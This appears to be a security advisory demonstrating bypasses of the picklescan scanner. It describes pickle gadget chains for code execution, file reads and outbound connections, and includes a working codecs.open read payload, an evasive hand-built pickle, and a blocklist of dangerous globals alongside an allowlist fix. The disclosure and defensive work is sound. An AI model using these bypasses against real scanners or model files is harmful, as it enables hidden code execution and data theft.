
Picklescan Scanner Bypass PoC

Multiple bypasses of picklescan v1.0.3 that achieve arbitrary code execution, file read/write, and network access while the scanner reports 0 dangerous issues.

Bypasses Demonstrated

1. Full RCE via importlib.import_module + marshal.loads + types.FunctionType

  • File: rce_bypass.pkl
  • Impact: Arbitrary command execution
  • Technique: Chain three callables that are not on the blocklist: importlib.import_module to obtain modules, marshal.loads to deserialize a precompiled code object, and types.FunctionType to turn that code object into a callable function
  • Picklescan result: 0 issues, 0 infected files

2. Arbitrary File Read via codecs.open

  • File: file_read_bypass.pkl
  • Impact: Read any file on the filesystem
  • Technique: codecs.open wraps builtins.open and gives the same file read/write capability, but is not in the blocklist
  • Picklescan result: 0 issues, 0 infected files

3. Network Access via http.client.HTTPSConnection

  • File: network_bypass.pkl
  • Impact: Establish outbound HTTPS connections for data exfiltration
  • Technique: http.client is the Python 3 equivalent of the blocked Python 2 module httplib, but is not itself blocked
  • Picklescan result: 0 issues, 0 infected files

4. Additional bypasses (not included as files):

  • io.open - the same function object as builtins.open, not blocked
  • importlib.import_module('os') - imports any module including os

Root Cause

Picklescan uses a blocklist-only architecture: only globals explicitly listed in _unsafe_globals increment issues_count. Every other global is at most classified as "suspicious", which does not cause the scan to fail. Because a pickle can import any module and call any attribute of it, any module not on the blocklist, standard library included, remains reachable from a malicious pickle.

Reproduction

import pickle
from picklescan.scanner import scan_file_path

# Scan the PoC file: picklescan reports it clean
result = scan_file_path("rce_bypass.pkl")
print(f"Issues: {result.issues_count}")  # Output: 0

# Load the same file: the pickle executes a system command
with open("rce_bypass.pkl", "rb") as f:
    pickle.loads(f.read())  # Executes system command
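Added example, not one of this repository's PoC files and not picklescan's code: it rebuilds the codecs.open bypass described above against a temp file it creates itself, shows that a blocklist-style check returns no issues for it, and shows an allowlist check over the same GLOBAL/STACK_GLOBAL opcodes (via pickletools.genops, without ever calling pickle.loads) that rejects it. BLOCKLIST and ALLOWLIST are illustrative sets, not picklescan's real _unsafe_globals table, and EVASIVE_PAYLOAD is a hand-assembled pickle used only to show that the allowlist check fails closed when STACK_GLOBAL operands cannot be resolved statically. Standard library only.

```python
import codecs
import collections
import os
import pickle
import pickletools
import tempfile

# Illustrative blocklist in the spirit of the design described under Root Cause.
# Assumption: this is NOT picklescan's real _unsafe_globals table.
BLOCKLIST = {("builtins", "open"), ("builtins", "eval"), ("builtins", "exec"),
             ("os", "system"), ("subprocess", "Popen"), ("httplib", "HTTPConnection")}

# Illustrative allowlist: the only globals a plain data pickle may import.
ALLOWLIST = {("builtins", "set"), ("builtins", "frozenset"),
             ("builtins", "bytearray"), ("collections", "OrderedDict")}

# Opcodes that push a string constant (STACK_GLOBAL consumes two of them) and
# memo-only opcodes that may legitimately sit between them.
STRING_OPS = {"STRING", "BINSTRING", "SHORT_BINSTRING",
              "UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}
MEMO_OPS = {"MEMOIZE", "PUT", "BINPUT", "LONG_BINPUT"}

# Hand-assembled (constructed) protocol-4 pickle: pushes "codecs" and "open",
# then feeds STACK_GLOBAL from the memo via BINGET instead of fresh constants.
EVASIVE_PAYLOAD = b"\x80\x04\x8c\x06codecs\x94\x8c\x04open\x94h\x00h\x01\x93."


class CodecsOpenRead:
    """Unpickles to codecs.open(path, "r", "utf-8"): the file-read bypass above."""

    def __init__(self, path):
        self.path = path

    def __reduce__(self):
        return (codecs.open, (self.path, "r", "utf-8"))


def referenced_globals(data):
    """Statically list the (module, name) pairs a pickle imports by walking its
    GLOBAL / STACK_GLOBAL opcodes. Nothing is imported or executed. A STACK_GLOBAL
    whose operands are not the two string constants pushed right before it is
    counted as unresolved rather than guessed at."""
    ops = [(op.name, arg) for op, arg, _pos in pickletools.genops(data)]
    found, unresolved = set(), 0
    for i, (name, arg) in enumerate(ops):
        if name == "GLOBAL":            # protocol <= 3: arg is "module name"
            found.add(tuple(arg.split(" ", 1)))
        elif name == "STACK_GLOBAL":    # protocol 4+: operands come from the stack
            operands, j = [], i - 1
            while j >= 0 and len(operands) < 2:
                prev_name, prev_arg = ops[j]
                if prev_name in STRING_OPS:
                    operands.append(prev_arg)
                elif prev_name not in MEMO_OPS:
                    break
                j -= 1
            if len(operands) == 2:
                found.add((operands[1], operands[0]))  # pushed as module, then name
            else:
                unresolved += 1
    return found, unresolved


def blocklist_issues(data):
    """Blocklist-only verdict: only listed globals count; everything else is 'clean'."""
    globs, _unresolved = referenced_globals(data)
    return sorted(globs & BLOCKLIST)


def allowlist_issues(data):
    """Allowlist verdict: anything not permitted, or not resolvable, is an issue."""
    globs, unresolved = referenced_globals(data)
    issues = sorted(globs - ALLOWLIST)
    if unresolved:
        issues.append(("<unresolved STACK_GLOBAL>", str(unresolved)))
    return issues


def demo():
    """Aim the bypass at a constructed temp file and compare both verdicts."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as fh:
        fh.write("constructed secret")                 # sample target, not real data
        target = fh.name
    try:
        payload = pickle.dumps(CodecsOpenRead(target))  # default protocol: STACK_GLOBAL
        legacy = pickle.dumps(CodecsOpenRead(target), protocol=2)  # GLOBAL opcode
        with pickle.loads(payload) as reader:          # what a "clean" load really does
            leaked = reader.read()
    finally:
        os.unlink(target)
    benign = pickle.dumps(collections.OrderedDict(a=1))
    return {
        "blocklist": blocklist_issues(payload),        # [] -> reported clean
        "allowlist": allowlist_issues(payload),        # [("codecs", "open")]
        "legacy_globals": sorted(referenced_globals(legacy)[0]),
        "leaked": leaked,
        "benign_allowlist": allowlist_issues(benign),  # [] -> benign data passes
        "evasive_blocklist": blocklist_issues(EVASIVE_PAYLOAD),  # [] -> still "clean"
        "evasive_allowlist": allowlist_issues(EVASIVE_PAYLOAD),  # fails closed
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

The point of the allowlist variant is that the scanner never needs to know about codecs.open, io.open, http.client or importlib in advance: anything a model file imports that is not on the short permitted list is an issue, and anything the static walk cannot resolve is an issue too.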

Affected Version

  • picklescan 1.0.3 (latest as of Feb 2026)
  • All prior versions likely affected (same blocklist architecture)